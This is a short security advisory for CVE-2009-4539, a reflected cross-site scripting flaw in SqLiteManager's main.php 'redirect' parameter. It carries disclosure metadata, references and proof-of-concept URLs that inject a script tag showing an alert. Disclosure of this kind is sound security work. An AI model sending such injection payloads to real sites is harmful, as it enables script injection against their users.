Topic : | XSS in SqLiteManager
|
SecurityAlert : 6908
CVE : CVE-2009-4539
CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : Yes
Credit : Hadi Kiamarsi
Published : 06.01.2010
Affected Software : | sqlitemanager:sqlitemanager:1.2.0 |
 Advisory Content :
###########################################
#
# SqLiteManager ( All Version ) Cross Site Scripting
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi (at) gmail (dot) com [email concealed]
#
# Download :
http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2
.0/SQLiteManager-1.2.0.zip?use_mirror=heanet
#
###########################################
PoC :
http://[www.example.com]/main.php?redirect=<script>alert('Hadi
Kiamarsi')</script>
http://[www.example.com]/[PATH]/main.php?redirect=<script>alert('Hadi
Kiamarsi')</script>
local Example :
http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>
References :
http://xforce.iss.net/xforce/xfdb/52357
http://www.securityfocus.com/bid/36002
http://www.securityfocus.com/archive/1/archive/1/505636/100/0/threaded
http://secunia.com/advisories/28642
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|